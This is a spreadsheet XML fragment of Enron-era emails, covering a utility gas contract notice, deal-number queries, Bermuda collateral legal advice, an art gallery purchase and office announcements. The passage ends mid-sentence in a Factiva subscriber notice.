    <t>Thu, 25 Oct 2001 10:03:21 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rpetti@ladwp.com'})</t>
  </si>
  <si>
    <t>LADWP Gas Contract</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Dear Potential Gas Supplier_x000D_
_x000D_
As some of you may know our authority to buy gas off our existing spot agreement_x000D_
will come to an end on December 31, 2001.  While we will honor current_x000D_
commitments for gas to be delivered after that date, but we will not be able to_x000D_
use the spot agreement to buy any more gas.  The reason that this is happening_x000D_
is that our City Attorney has interpreted the new City Charter as not allowing_x000D_
delegations of authority such as employed in the way we buy gas now._x000D_
_x000D_
We are seeking approval for an ordinance which must be approved by the City_x000D_
Council that will restore our former ability to buy gas with the kind of_x000D_
agreement most gas suppliers are familiar.  We have the ordinance approved by_x000D_
the City Attorney and it will shortly be in the pipeline for approval by our_x000D_
Board and the City Council, but until then, this contract is a stop gap to keep_x000D_
us operating._x000D_
_x000D_
I've attached the new contract and a cover letter which explains what we are_x000D_
doing.  The deadline is November 8, 2001 at 4:00 PM.  We will take the executed_x000D_
contracts to our Board with the counterparties listed on a Board Resolution and,_x000D_
if it is approved, we will be allowed to buy gas from this group after the new_x000D_
year begins.  This is not the ideal contract but one we feel our Board will be_x000D_
comfortable with until we can get around the Charter problem.  I can't make any_x000D_
changes to this contract.  There is a notice published in the LA Times about the_x000D_
availability of the contract but I am sending it to you directly as someone we_x000D_
have already done business with (and undoubtedly have satisfied all our_x000D_
boilerplate requirements) and will probably be interested in what we are trying_x000D_
to do here._x000D_
_x000D_
I Hope most of you will respond.  Thanks_x000D_
_x000D_
(See attached file: Spot Gas Cover Letter.doc)(See attached file: New Spot Gas_x000D_
Contract.doc)_x000D_
_x000D_
 - Spot Gas Cover Letter.doc _x000D_
 - New Spot Gas Contract.doc </t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 01:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'doug.nelson@enron.com'})</t>
  </si>
  <si>
    <t>Re: TAGG Numbers?</t>
  </si>
  <si>
    <t xml:space="preserve">Sitara #119378 is for all three N17872 legs and EY4000.2 is sitara #115203.  _x000D_
THe remaining liquidation EY4008.2 should be a liq no flow.  The deal was _x000D_
killed._x000D_
PL_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Doug Nelson@ENRON_x000D_
02/05/2001 07:06 PM_x000D_
To: Phillip M Love/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: TAGG Numbers?_x000D_
_x000D_
Phillip,_x000D_
_x000D_
Would you please identify the SITARA numbers for the following TAGG numbers?_x000D_
_x000D_
 #N17872.3_x000D_
 #N17872.5_x000D_
 #N17872.7_x000D_
_x000D_
 #EY4000.2_x000D_
 #EY4000.8_x000D_
_x000D_
Deal Capture did not help._x000D_
_x000D_
Thanks,_x000D_
Doug - Settlements_x000D_
3-0560_x000D_
_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 4 May 2000 01:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Our luncheon</t>
  </si>
  <si>
    <t>Tana:_x000D_
When you knnow it, please send Suzanne a list of names of people that will be _x000D_
attending._x000D_
Carol</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 08:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'nmanne@susmangodfrey.com', 'rrivera@susmangodfrey.com'})</t>
  </si>
  <si>
    <t>Paragraph to Duke Letter</t>
  </si>
  <si>
    <t xml:space="preserve">Please review the attached changes to the language that Eric developed.  A _x000D_
bit more detail has been added but the arguement is still general in nature._x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 03:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Final Filed Version -- SDG&amp;E Comments</t>
  </si>
  <si>
    <t>Whoever wrote this did an excellent job</t>
  </si>
  <si>
    <t>Wed, 18 Apr 2001 02:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sara.shackleton@enron.com', 'carol.clair@enron.com'})</t>
  </si>
  <si>
    <t>Re: Cash Collateral</t>
  </si>
  <si>
    <t xml:space="preserve">please translate_x000D_
---------------------- Forwarded by Caroline Abramo/Corp/Enron on 04/18/2001 _x000D_
10:27 AM ---------------------------_x000D_
_x000D_
_x000D_
"Chris Garrod" &lt;CGGarrod@cdp.bm&gt; on 04/18/2001 09:50:41 AM_x000D_
To: &lt;Carol.St.Clair@enron.com&gt;_x000D_
cc: &lt;Brent.Hendry@enron.com&gt;, &lt;Caroline.Abramo@enron.com&gt;, _x000D_
&lt;Paul.Radous@enron.com&gt;, &lt;Sara.Shackleton@enron.com&gt; _x000D_
_x000D_
Subject: Re: Cash Collateral_x000D_
_x000D_
_x000D_
Dear Carol_x000D_
_x000D_
Under Bermuda law, there is no real concept of "perfecting" security since it _x000D_
is not necessary to ensure the enforceability in Bermuda that a charge be _x000D_
registered in Bermuda.  However, although it is not necessary for a security _x000D_
interest to be registered in order for it to be valid, the charge document _x000D_
itself can be registered in Bermuda in the Register of Charges in accordance _x000D_
with Section 55 of the Companies Act 1981 in order to ensure the priority in _x000D_
Bermuda of the charge.  On registration, any charge evidenced in the charging _x000D_
document will have priority over any unregistered competing charge or any _x000D_
subsequently registered competing charge in respect of the assets which are _x000D_
the subject of the charge (i.e. the cash)._x000D_
_x000D_
If the agreement will be governed by either Texas or New York law, it will be _x000D_
a matter of the laws of either Texas or New York as to the actual nature of _x000D_
the security interest which is created by the charge._x000D_
_x000D_
If you would like us to effect the registration of the charge, we would need _x000D_
an original (or a certified true copy) of the executed document which creates _x000D_
the security interest.  There is no time limit on such registration.  _x000D_
However, please note that, in addition to our professional fees, there is a _x000D_
filing fee of $446 which is payable in respect of the registration._x000D_
_x000D_
I trust that the above is of some assistance.  If you have any questions _x000D_
please do not hesitate to contact me._x000D_
_x000D_
Kind regards._x000D_
_x000D_
Chris Garrod_x000D_
_x000D_
_x000D_
Christopher Garrod_x000D_
Conyers Dill &amp; Pearman_x000D_
Clarendon House, 2 Church Street_x000D_
Hamilton HM 11, Bermuda_x000D_
Direct dial  441 299 4923_x000D_
Fax:  441 292 4720_x000D_
email  cggarrod@cdp.bm_x000D_
_x000D_
&gt;&gt;&gt; &lt;Carol.St.Clair@enron.com&gt; 04/17/01 06:54PM &gt;&gt;&gt;_x000D_
Christopher:_x000D_
We have done a trade with a Bermuda hedge fund and have negotiated_x000D_
collateral provisions that may require them to post csah to us.  The_x000D_
agreement will be governed by either Texas or New York law.  We need your_x000D_
advice on how to perfect our interest in any cash posted to us that we_x000D_
would hold in an account in the United States.  Could you please call_x000D_
either me or Sara Shackelton (713)853-5620 if possible tomorrow or you can_x000D_
send me an e-mail if that is easier.  I'm hoping that our possession of the_x000D_
cash is enough.  Sorry for the short fuse on this.  If you need any_x000D_
additional information, please contact me or Sara.  I will be unavailable_x000D_
from 9-11 and 2-3 tomorrow Houston time._x000D_
_x000D_
Carol St. Clair_x000D_
EB 3889_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Jan 2001 02:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Three for Three</t>
  </si>
  <si>
    <t xml:space="preserve">No not a promise but it more or less went like this:  Kathy:  "Lavo, you have _x000D_
caused me a lot of grief by taking both Ryan and Chad, you wouldn't believe _x000D_
the overtime I had to work.  I should get some kind of hiring bonus or _x000D_
something".  John:  "Well if you go three for three you're on"._x000D_
_x000D_
I have read that the average cost of hiring/training someone is approx _x000D_
$80,000.  I am willing to accept much less than this.  Actually I don't _x000D_
really expect anything I just thought I would give it a shot._x000D_
_x000D_
Kathy_x000D_
_x000D_
_x000D_
From: John J Lavorato@ENRON on 01/19/2001 08:28 AM CST_x000D_
To: Kathy Reeves/CAL/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Three for Three  _x000D_
_x000D_
In all seriousness, did I promise you a payment._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 06:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeff.dasovich@enron.com', 'steve.montovano@enron.com', 'paul.kaufman@enron.com', 'richard.shapiro@enron.com', 'leslie.lawner@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Gas Issues paper</t>
  </si>
  <si>
    <t xml:space="preserve">Here is a working draft of the gas issues/diversion/penalties, etc. paper.  _x000D_
Becky is working on the interstate pipeline tariffs and we will insert them, _x000D_
and Jeff Hidge will be sending something out about ENA legal issues, which I _x000D_
will add in.  I am also going to work on this tonite, to make the individual _x000D_
LDC diucssions follow a common template.  However, I wanted you to have _x000D_
something to look at before the meeting tomorrow morning.  I still have a _x000D_
couple of LDCs to add.  Thanks._x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 00:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Hey Shorty,_x000D_
_x000D_
I just got back into town from Memphis (they really like Elvis) and _x000D_
Washington D.C., so that explains the delay in getting back to you.  I got my _x000D_
car detailed at Dream's car wash on San Felipe (just before Target).  They do _x000D_
a good job but don't get all the extra stuff they want to sell you.  I hope _x000D_
you had a fun Halloween weekend/last night and after Oklahoma dismantled _x000D_
Nebraska, the Longhorn whooping doesn't look that bad anymore (...but Texas _x000D_
in the top 20?)._x000D_
_x000D_
Ted_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan M Scott_x000D_
10/30/2000 11:48 AM_x000D_
To: Ted Noble/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
Hey,_x000D_
_x000D_
Quick question, I was hoping to go get my car detailed this weekend and I _x000D_
remembered that you had your truck detailed a while back...I was wondering _x000D_
where you had it done and if you thought they did a good job ( I'm assuming _x000D_
the place is pretty close to our area of town).  I finally got into the _x000D_
parking garage and have decided I now have real incentive to keep my car _x000D_
looking nice._x000D_
_x000D_
Hope things are well with you.  I talked to Darren last week and it sounds as _x000D_
though he is extremely busy these days.  I'm guessing the story's much the _x000D_
same with you - a far cry from the listless days you two spent in Net Works.  _x000D_
Anyway, if you could let me know about the detailing I would appreciate it._x000D_
_x000D_
Susan_x000D_
_x000D_
By the way, since there's no telling if I'll have the opportunity to gloat _x000D_
two weeks from now (Tech in Lubbock is never a safe bet) - and while neither _x000D_
season has been one for the record books (except of course for our loss to OU _x000D_
- one of the worst in history) - I noticed that unlike the Longhorns, your _x000D_
beloved Bruins are conspicuously absent from the top 25.  Oh well, c'est la _x000D_
vie._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Jun 2000 06:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'timothy.blanchard@enron.com', 'matthew.lenhart@enron.com', 'chad.landry@enron.com'})</t>
  </si>
  <si>
    <t>More I-bank info</t>
  </si>
  <si>
    <t xml:space="preserve">guess who sent me this!_x000D_
_x000D_
it actually is pretty interesting to see how other companies value their _x000D_
analysts, though._x000D_
---------------------- Forwarded by Eric Bass/HOU/ECT on 06/13/2000 01:49 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Brian Hoskins_x000D_
06/13/2000 01:43 PM_x000D_
To: Eric Bass/HOU/ECT@ECT, Hector Campos/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: More I-bank info_x000D_
_x000D_
_x000D_
	jason.glass@db.com_x000D_
	06/13/00 12:28 PM_x000D_
		 _x000D_
		 To: pjaising@enron.com_x000D_
		 cc: (bcc: Priya Jaisinghani/Enron Communications)_x000D_
		 Subject: _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Best Regards-_x000D_
_x000D_
Jason E Glass_x000D_
Deutsche Banc Alex. Brown_x000D_
Houston Energy Group_x000D_
909 Fannin Suite 3000_x000D_
Houston, TX 77010_x000D_
(713) 759-6786_x000D_
(713) 759-6736 Fax_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt;Fast Track Promotion__.doc&gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 06:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Additional Gas Item --- RE: Western Wholesale Activities - Gas &amp;_x000D_
 Power Conf. Call</t>
  </si>
  <si>
    <t xml:space="preserve">Another gas item which I had not gotten around to adding to the table yet:_x000D_
_x000D_
Docket No.  CP01-106_x000D_
Response to Kern River Petition for Declaratory Order_x000D_
Due:  June 11 (?)_x000D_
Affects the California Emergency Project to add 135 MM/d of capacity approved _x000D_
by FERC on April 6 with an expected in-service date of July 1, 2001.  On _x000D_
April 5 SoCal Gas notified Kern River that, pursuant to the terms of a 1989 _x000D_
agreement between them, SoCal Gas was entitled to first rights, and was _x000D_
asserting such rights, on this or any capacity expansions into California on _x000D_
Kern's system.  We will support Kern River's petition._x000D_
Comments are being drafted.  SoCal Gas has asked FERC not to approve the _x000D_
shortened comment period of June 11; FERC has not responded yet._x000D_
_x000D_
_x000D_
_x000D_
From: Alan Comnes/ENRON@enronXgate on 06/07/2001 01:03 PM_x000D_
To: Ray Alvarez/NA/Enron@ENRON, Steve Walton/HOU/ECT@ECT, Susan J _x000D_
Mara/NA/Enron@ENRON, Leslie Lawner/NA/Enron@Enron, Rebecca W _x000D_
Cantrell/HOU/ECT@ECT, Donna Fulton/Corp/Enron@ENRON, Jeff _x000D_
Dasovich/NA/Enron@Enron, Christi L Nicolay/HOU/ECT@ECT, James D _x000D_
Steffes/NA/Enron@Enron, jalexander@gibbs-bruns.com@SMTP@enronXgate, Phillip K _x000D_
Allen/ENRON@enronXgate, Linda J Noske/HOU/ECT@ECT, Dave Perrino/SF/ECT@ECT, _x000D_
Don Black/HOU/EES@EES, Robert Frank/NA/Enron@Enron, Stephanie _x000D_
Miller/ENRON@enronXgate, Barry Tycholiz/ENRON@enronXgate, Steve C _x000D_
Hall/ENRON@enronXgate, Sarah Novosel/Corp/Enron@ENRON_x000D_
cc:  _x000D_
Subject: RE: Western Wholesale Activities - Gas &amp; Power Conf. Call Privileged _x000D_
&amp; Confidential Communication Attorney-Client Communication and Attorney Work _x000D_
Product Privileges Asserted_x000D_
_x000D_
Western Wholesale Activities Conference Call  - Gas &amp; Power_x000D_
Date:   Today and Every Thursday_x000D_
Time:    1:00 pm Pacific, 3:00 pm Central, and 4:00 pm Eastern time,_x000D_
 Number:   1-888-271-0949 _x000D_
 Participant Code: 936022 _x000D_
_x000D_
In Ray's absence, I am facilitating today's call.  The proposed agenda (Item _x000D_
numbers refer to the proceedings document row number):_x000D_
_x000D_
Electric_x000D_
1. Responses to  ISO and CA utility RTO filings due June 19 (item 9a)_x000D_
2. ATC Complaint - next steps (item 20)_x000D_
3. RTO Seams Conference 6/19/01 and request to speak due tomorrow 6/8/01 _x000D_
(item 37)_x000D_
4. ISO withholding of as-bid and OOM price data_x000D_
5. Generator data requests - (Hatsoe)_x000D_
_x000D_
Gas_x000D_
6. Response to FERC to Re-Impose Transportation Price Caps (item 36)_x000D_
7. Quarterly reporting requirements (item 35)_x000D_
8. Gas-related data requests  (item 33)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 22 Nov 2000 00:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ww@williamweston.co.uk'})</t>
  </si>
  <si>
    <t>Re: Current Catalogue</t>
  </si>
  <si>
    <t xml:space="preserve">William,_x000D_
_x000D_
I am very interested in both the Signac and Cross._x000D_
_x000D_
A few  questions about the pieces.  You referenced Meier Graefe for "Pan" for _x000D_
both pieces.  I don't know what that means could you please clarify?  Also I _x000D_
don't understand the reference to an Album.  Is the Signac numbered?  Are _x000D_
either signed on the stone?_x000D_
_x000D_
Thanks,_x000D_
mike_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"William Weston" &lt;ww@williamweston.co.uk&gt; on 10/27/2000 11:14:22 AM_x000D_
To: &lt;mike.mcconnell@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Re: Current Catalogue_x000D_
_x000D_
_x000D_
Dear Mr McConnell_x000D_
_x000D_
Thank you for your e-mail of the 20th October. I apologise for the slow_x000D_
reply but I was travelling when it was received at the gallery._x000D_
_x000D_
I now have 'pointillist' colour works by Cross and Signac which might be of_x000D_
interest to you. Both are from the collection of one of my clients._x000D_
_x000D_
The Signac is similar to the work that you liked on the website. The_x000D_
details are:_x000D_
_x000D_
Paul Signac Le Soir - Evening Jetty at Flessingue_x000D_
Original lithograph in five colours. 1898. From the issued edition,_x000D_
commissioned and issued by Meier Graefe for the album 'Pan', Berlin 1898._x000D_
Drawn and printed at the studio of Clot, Paris 1897/98. Ref: Kornfeld and_x000D_
Wick Paul Signac Prints no 20, as completed and issued. Exceptionaly fine_x000D_
and fresh impression with totally unfaded colours. On off-white chine_x000D_
volant paper. Full margins. Image: 8 x 10 3/8ins. o2500 (US$ 3750)_x000D_
_x000D_
There is no illustration of the Cross on the website. If you do not know_x000D_
the image then we could arrange for a printout in colours to be sent to you_x000D_
by Fedex (we do not currently have scan available for e-mail) but we would_x000D_
need your full mailing address._x000D_
_x000D_
The details are as follows:_x000D_
_x000D_
Henri Edmond Cross - In the Champs Elysees. Les Nourrices._x000D_
Original lithograph in colours. 1898. Numbered in pencil from the very_x000D_
scarce de-luxe edition of 75 impressions. Prior to the regular issued_x000D_
edition for the album. Commissioned and issued by Meier Graefe for 'Pan,_x000D_
Berlin 1898. Drawn and printed at the studio of Clot, Paris 1897/98._x000D_
Exceptionally fine fresh impression of the rare de-luxe edition. On china_x000D_
paper mounted on a japan backing sheet as issued. Full margins. excellent_x000D_
condition. Image: 7 7/8 x 10 1/4ins. o 2500 (US$3750)_x000D_
_x000D_
Shipping and insurance extra (c. US$115 for either work)._x000D_
_x000D_
I will look forward to hearing from you. Thank you for your interest in my_x000D_
gallery_x000D_
_x000D_
William Weston._x000D_
_x000D_
_x000D_
----------_x000D_
&gt; From: mike.mcconnell@enron.com_x000D_
&gt; To: enquiries@williamweston.co.uk_x000D_
&gt; Subject: Current Catalogue_x000D_
&gt; Date: 19 October 2000 02:01_x000D_
&gt;_x000D_
&gt; Name: Mike McConnell_x000D_
&gt; Email: mike.mcconnell@enron.com_x000D_
&gt; Address: 13451 Belhaven Dr._x000D_
&gt; City: Houston, Texas_x000D_
&gt; Country: USA_x000D_
&gt; Subject: Current Catalogue_x000D_
&gt; Message:_x000D_
&gt; I am interested in purchasing a Signet or Cross.  I liked the one that_x000D_
was sold out.  I have been in your gallery several times on business trips_x000D_
to London.  I would like to do business with you, I really like your_x000D_
gallery._x000D_
&gt; Please let me know if a new piece comes available._x000D_
&gt; Thanks,_x000D_
&gt; Mike McConnell_x000D_
&gt;_x000D_
&gt; Browser: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 11:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dakotaleg@aol.com'})</t>
  </si>
  <si>
    <t>WINE RECEPTION</t>
  </si>
  <si>
    <t xml:space="preserve">Please mark your calendars for a wine reception on June 7th._x000D_
_x000D_
_x000D_
The Daily Review Cafe_x000D_
&amp;_x000D_
Dakota Framing &amp; Photography_x000D_
_x000D_
invite you to a Wine Reception_x000D_
Thursday June, 7th 2001_x000D_
5:00 - 8:00pm_x000D_
Photographic Images by TOM KILTY_x000D_
_x000D_
The Daily Review Cafe_x000D_
3412 West Lamar @ Dunlavy_x000D_
713-520-9217_x000D_
_x000D_
Wine and Hors d'oeuvres will be served_x000D_
cash bar also available_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Content-Transfer-Encoding: 7bit_x000D_
Return-path: &lt;DakotaLeg@aol.com&gt;_x000D_
From: DakotaLeg@aol.com_x000D_
Full-name: DakotaLeg_x000D_
Message-ID: &lt;88.6df60d4.283d9221@aol.com&gt;_x000D_
Date: Wed, 23 May 2001 18:22:25 EDT_x000D_
Subject: WINE RECEPTION_x000D_
To: DakotaLeg@aol.com_x000D_
MIME-Version: 1.0_x000D_
Content-Type: text/plain; charset="US-ASCII"_x000D_
X-Mailer: AOL 5.0 for Windows sub 138_x000D_
_x000D_
Please mark your calendars for a wine reception on June 7th._x000D_
_x000D_
_x000D_
The Daily Review Cafe_x000D_
&amp;_x000D_
Dakota Framing &amp; Photography_x000D_
_x000D_
invite you to a Wine Reception_x000D_
Thursday June, 7th 2001_x000D_
5:00 - 8:00pm_x000D_
Photographic Images by TOM KILTY_x000D_
_x000D_
The Daily Review Cafe_x000D_
3412 West Lamar @ Dunlavy_x000D_
713-520-9217_x000D_
_x000D_
Wine and Hors d'oeuvres will be served_x000D_
cash bar also available_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 00:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bubenko@enron.com'})</t>
  </si>
  <si>
    <t>VP &amp; Director Count for the Research Group</t>
  </si>
  <si>
    <t>Hello Deborah:_x000D_
_x000D_
I would like to introduce myself and Anita Dupont to you as we will probably_x000D_
be working together quite a bit between now and our move.  Please feel _x000D_
free to contact either one of us regarding any questions or needs you _x000D_
may have._x000D_
_x000D_
Headcount_x000D_
The Executive, VP and Director headcount for the Research group is:_x000D_
Managing Director  1_x000D_
Vice Presidents   6_x000D_
Directors   5_x000D_
_x000D_
Also, Anita and I would like to invite you to meet with us and go over our _x000D_
library space requirements.  Please let me know when you have some _x000D_
free time and we will be available._x000D_
_x000D_
My number is: 3-5290 - EB1961_x000D_
Anita's # is: 3-0329 - EB1969_x000D_
_x000D_
I look forward to meeting you,_x000D_
_x000D_
Shirley Crenshaw_x000D_
Administrative Coordinator_x000D_
Enron Research Group_x000D_
3-5290</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 17:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>March of Dimes Raffle Update</t>
  </si>
  <si>
    <t>Once again, Enron employees showed their generosity. =20_x000D_
_x000D_
Thanks to everyone who participated in the March of Dimes Raffle, we raised=_x000D_
=20_x000D_
over $1,750. =20_x000D_
_x000D_
The Big Winners in the raffle were:_x000D_
_x000D_
 Mary Anne Miller - Airline tickets_x000D_
 Cindy Stark - Compaq PA Personal Audio Player_x000D_
 Mary Vollmer - Urban Retreat Gift Certificate_x000D_
 Ben Nguyen - Four Astros Tickets_x000D_
 John Chang - Four Astros Tickets_x000D_
 Betty Keenan - Barrington Roller Pen_x000D_
 Bob McAuliffe - Cutter &amp; Buck Polo Shirt_x000D_
 Kimberly Nelson - Zippered Portfolio_x000D_
 Karon O=01,Gorman - Desk Clock_x000D_
 Tammy Kovalcik - Laptop Carrying Case_x000D_
 Lisa Gilchrist - Laptop Carrying Case_x000D_
 Sharon Farrell - Laptop Carrying Case_x000D_
 Scott Churbock - Laptop Carrying Case_x000D_
 Argelia Vallejo - Laptop Carrying Case_x000D_
 Mike Millwee - Microsoft Office 2000 Professional Software_x000D_
 Stacy Holtzman - Microsoft Visio2000 Technical Edition Software_x000D_
_x000D_
Thanks again for supporting March of Dimes!</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 08:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dan.junek@enron.com', 'john.carr@enron.com', 'glenn.kobes@enron.com', 'micah.hatten@enron.com', 'james.derrick@enron.com', 'james.davis@enron.com', 'jayant.krishnaswamy@enron.com', 'dominic.izzo@enron.com', 'rob.gay@enron.com', 'john.powell@enron.com'})</t>
  </si>
  <si>
    <t>Priority Locker Selection-Men's</t>
  </si>
  <si>
    <t>In anticipation of re-opening, you have an opportunity to pre-select your new _x000D_
locker location.  All active Body Shop members who had a permanent locker at _x000D_
the time of the September 1st construction close have been given first _x000D_
consideration when selecting their new locker location before December 29th.  _x000D_
 Priority will be given to member's original locker location (i.e. a member _x000D_
who requests their original locker area will be given priority for that _x000D_
space).  After this date lockers will be distributed to members on the _x000D_
waiting list and to member's with permanent lockers who request a different _x000D_
space from their original locker area.   For your convenience, a Body Shop _x000D_
enrolment and locker request table will be in the lobby from December 18th _x000D_
through January 5th between the hours of 11am - 1:30pm. _x000D_
_x000D_
_x000D_
_x000D_
Follow these simple steps to secure your locker location:_x000D_
Open and review the attached Men's Locker Design template._x000D_
Select your 1st, 2nd, and 3rd choice location preference._x000D_
Complete the Locker Selection Request Form.  _x000D_
Complete and Sign the Locker Payroll Deduction Form._x000D_
Return all completed forms before December 29th to the Body Shop at EB1355, _x000D_
drop off at our offices on EB1372 or at the Body Shop Table in the lobby from _x000D_
December 18th through January 5th between the hours of 11am - 1:30pm._x000D_
_x000D_
You will receive an e-mail notifying you of your new locker location and _x000D_
locker combination prior to re-opening.  If you have any questions, please _x000D_
contact the Body Shop Front Desk at  x35547.</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2001 04:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Approval</t>
  </si>
  <si>
    <t xml:space="preserve">Done._x000D_
_x000D_
K_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Lester Rawson_x000D_
03/13/2001 12:14 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Approval_x000D_
_x000D_
Kate,_x000D_
_x000D_
Please approve and autoschedule annuity 442260. For Sept. 30,  2000._x000D_
_x000D_
les_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Mar 2000 10:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'titman@mail.utexas.edu'})</t>
  </si>
  <si>
    <t>Re: Meeting!</t>
  </si>
  <si>
    <t>Professor Titman:_x000D_
Thank you for talking with the people in the admissions office.  I wanted to _x000D_
ask you what you think I could do at this point to help the admission's _x000D_
people understand the reason for my GMAT score.  I know that this is a poor _x000D_
reflection of what I can actually achieve and I know that I will do well and _x000D_
be successful in the learning environment at UT.  If I need to, I can provide _x000D_
the admissions office the documents stating the disability.  If you can let _x000D_
me know what you think I can do, I would appreciate it.  Thanks agin!_x000D_
Ben</t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 04:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'robert.cass@enron.com', 'melba.lozano@enron.com'})</t>
  </si>
  <si>
    <t>product description change</t>
  </si>
  <si>
    <t>We would like to begin trading a new product on EOL.  The location - PG&amp;E _x000D_
Topock -  has already been set up, but we would like to make a small change _x000D_
to the long description.  The line which reads  -  "The transaction is for _x000D_
delivery at PG&amp;E, El Paso."  should be changed to "The transaction is for _x000D_
delivery at PG&amp;E Topock"    Please let me know when we can review the change, _x000D_
as Mike Grigsby would like to begin trading this product as soon as _x000D_
possible.  Thanks.</t>
  </si>
  <si>
    <t>Thu, 30 Aug 2001 15:55:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>Technical international regulatory support presentation</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Rick:_x000D_
_x000D_
Please find attached the presentation on the Technical International Regulatory Support.  I hope that you agree with its style of "less is more"; of course I can change it very quickly if needed.   _x000D_
_x000D_
As you can see from the email below, Guillermo has already started the process in Brazil; it seems to be a popular idea with Sergio._x000D_
_x000D_
Please let me know if you have any question._x000D_
_x000D_
Brgrds_x000D_
_x000D_
_x000D_
AI_x000D_
 _x000D_
  _x000D_
 -----Original Message-----_x000D_
From: 	Assad, Sergio  _x000D_
Sent:	Thursday, August 30, 2001 11:00 AM_x000D_
To:	Canovas, Guillermo_x000D_
Cc:	Ibrahim, Amr; Maurer, Luiz; Levy, Alberto; Gottfredson, Bryan; Braz, Gisele_x000D_
Subject:	Re: Technical international regulatory support_x000D_
_x000D_
Guilhermo_x000D_
Good idea !  _x000D_
Gisele Braz will inform us about schedule alternatives_x000D_
Thanks _x000D_
Sergio Assad_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From:	Guillermo Canovas/SA/Enron@ENRON &lt;mailto:Canovas/SA/Enron@ENRON&gt; on 08/30/2001 10:04 AM CDT_x000D_
To:	Sergio Assad/SA/Enron@Enron &lt;mailto:Assad/SA/Enron@Enron&gt;_x000D_
cc:	Amr Ibrahim/ENRON@enronXgate &lt;mailto:Ibrahim/ENRON@enronXgate&gt;, Luiz Maurer/SA/Enron@Enron &lt;mailto:Maurer/SA/Enron@Enron&gt;, Alberto Levy/SA/Enron@Enron &lt;mailto:Levy/SA/Enron@Enron&gt;, Bryan Gottfredson/ENRON@enronXgate &lt;mailto:Gottfredson/ENRON@enronXgate&gt; _x000D_
_x000D_
Subject:	Technical international regulatory support_x000D_
_x000D_
Sergio,_x000D_
We would like to have a conference call with you next week to present you the services provided by the new group of Technical International Regulatory Support. The group members are Amr Ibrahim, Luiz Maurer, Alberto Levy, Bryan Gottfredson and I._x000D_
Please let us know your schedule to arrange for the conference._x000D_
Regards,_x000D_
Guillermo_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 05:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'customersupport@factiva.rsc01.com'})</t>
  </si>
  <si>
    <t>Good news about the Financial Times and Dow Jones Interactive</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Subscriber:_x000D_
_x000D_
_x000D_
In our continuous commitment to enhance the services we offer_x000D_
you, Factiva is proud to announce the expanded availability of_x000D_
the Financial Times (FT)._x000D_
_x000D_
Commencing June 16, the full text from all editions of the FT,_x000D_
including FT.com, will be accessible to all Publications Library_x000D_
